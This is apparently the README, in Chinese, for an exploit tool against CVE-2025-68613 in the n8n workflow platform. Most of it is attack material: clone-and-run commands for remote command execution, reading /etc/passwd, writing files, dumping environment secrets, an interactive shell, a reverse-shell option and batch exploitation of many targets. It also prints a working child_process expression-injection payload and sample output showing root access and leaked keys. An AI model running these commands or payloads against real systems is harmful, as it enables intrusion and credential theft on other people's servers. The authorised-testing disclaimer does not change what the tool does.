n8n God Mode Ultimate - CVE-2025-68613 扫描器 v1.0.0 ║ ║ 工作流自动化远程代码执行
受影响的版本:
已修复的版本:
--detect - 仅版本检测(最快,非侵入式)--safe - 安全漏洞检查,不进行利用--poc - RCE 概念验证--exploit - 完全利用模式read <file> - 读取远程文件write <file> <content> - 写入文件到目标# Python 3.8 或更高版本
python3 --version
# pip 包管理器
pip3 --version
# 克隆仓库
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate
# 安装所需包
pip3 install -r requirements.txt
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6
# 显示帮助菜单
python3 n8n-godmode-ultimate.py -h
# 检测 n8n 版本(非侵入式)
python3 n8n-godmode-ultimate.py -u http://target:5678 --detect
# 安全漏洞检查
python3 n8n-godmode-ultimate.py -u http://target:5678 --safe -e [email protected] -p password
# RCE 概念验证
python3 n8n-godmode-ultimate.py -u http://target:5678 --poc -e [email protected] -p password
# 完全利用
python3 n8n-godmode-ultimate.py -u http://target:5678 --exploit -e [email protected] -p password
# 执行单个命令
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --cmd "whoami"
# 读取远程文件
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --read-file "/etc/passwd"
# 写入远程文件
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --write-file "/tmp/test.txt" --content "payload"
# 提取环境变量
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --dump-env
# 交互式 Shell
python3 n8n-godmode-ultimate.py --god -u http://target:5678 \
-e [email protected] -p password --shell
# 从文件扫描多个目标
python3 n8n-godmode-ultimate.py -l targets.txt --detect -t 20
# 批量利用
python3 n8n-godmode-ultimate.py -l targets.txt --poc -e [email protected] -p password -t 10
targets.txt 格式:
http://target1:5678
https://target2.example.com
http://192.168.1.100:5678
https://n8n.example.org
进入 shell 模式(--shell)后:
n8n> whoami # 执行命令
n8n> read /etc/passwd # 读取文件
n8n> env # 显示环境变量
n8n> info # 系统信息
n8n> history # 命令历史
n8n> exit # 退出 shell
-u, --url URL 目标 n8n URL
-l, --list FILE 包含目标 URL 的文件
-t, --threads NUM 批量扫描的线程数(默认: 10)
-e, --email EMAIL n8n 用户邮箱
-p, --password PASS n8n 用户密码
--detect 仅版本检测(最快)
--safe 安全检查,不进行利用
--poc RCE 概念验证
--exploit 完全利用模式
--god 启用 God Mode
--cmd COMMAND 执行单个命令
--read-file PATH 读取远程文件
--write-file PATH 写入远程文件
--content DATA 写操作的内容
--dump-env 提取所有环境变量
--shell 交互式 Shell 模式
--revshell HOST:PORT 反向 Shell 载荷
--mode MODE 利用模式: schedule|webhook|code|expression(默认: schedule)
--timeout SEC 命令超时秒数(默认: 30)
--cleanup 执行后删除工作流
-k, --insecure 禁用 SSL 验证
-v, --verbose 详细输出
-q, --quiet 最小输出
创建一个带计划触发器的工作流,每 3 秒自动执行。最可靠的方法。
载荷: {{(function(){
return this.process.mainModule.require('child_process')
.execSync('whoami').toString()
})()}}
创建一个 HTTP Webhook 端点,在触发时执行命令。
将代码直接注入具有 child_process 访问权限的代码节点。
通过 n8n 的表达式评估系统手动执行。
从登录页面中 base64 编码的 Sentry 配置提取版本:
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />
/rest/login - 认证/rest/workflows - 工作流 CRUD 操作/rest/credentials - 凭据枚举/rest/executions - 执行日志检索/rest/users - 用户枚举/rest/settings - 系统配置[*] n8n God Mode Ultimate v1.0.0
[*] 目标: https://target.example.com
[✓] n8n 版本: 1.36.1
[!] 状态: 存在漏洞(< 1.120.4)
[*] 认证成功
[*] 正在创建利用工作流...
[*] 工作流 ID: hd6LxSY765WBThqd
[*] 正在执行命令: whoami
[✓] 命令执行成功!
[+] 输出: root
n8n> whoami
[+] root
n8n> read /etc/hostname
[+] n8n-production-server
n8n> env
[+] 环境变量:
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...
仅用于授权的安全测试
本工具仅供教育目的和授权的安全测试使用。用户必须遵守所有适用的法律法规。
您必须:
您不得:
作者对本工具的 misuse 不承担任何责任。未经授权访问计算机系统是非法的,适用法律包括:
使用风险自负。您对自己的行为负责。
欢迎贡献!请遵循以下指南:
git checkout -b feature/improvement)git commit -am '添加新功能')git push origin feature/improvement)Satyam Rastogi
本项目采用 MIT 许可证 - 详见 LICENSE 文件。
MIT 许可证
版权(c)2025 Satyam Rastogi
特此授权,任何人免费获得本软件及相关文档文件("软件")的副本,可不受限制地处理本软件,包括但不限于使用、复制、修改、合并、发布、分发、再许可和/或销售软件副本的权利,并允许被提供软件的人员这样做,但须满足以下条件:
上述版权声明和本许可声明应包含在所有副本或实质性部分中。
本软件按"原样"提供,不提供任何明示或暗示的保证,包括但不限于适销性、特定用途适用性和非侵权性保证。在任何情况下,作者或版权持有人均不对任何索赔、损害或其他责任负责,无论该责任是基于合同、侵权或其他方式,由软件或软件的使用或其他处理引起或与之相关。
对于安全问题,请负责任地报告:
⭐ 如果您觉得这个仓库有用,请给个星!
💻 由安全研究人员为安全研究人员制作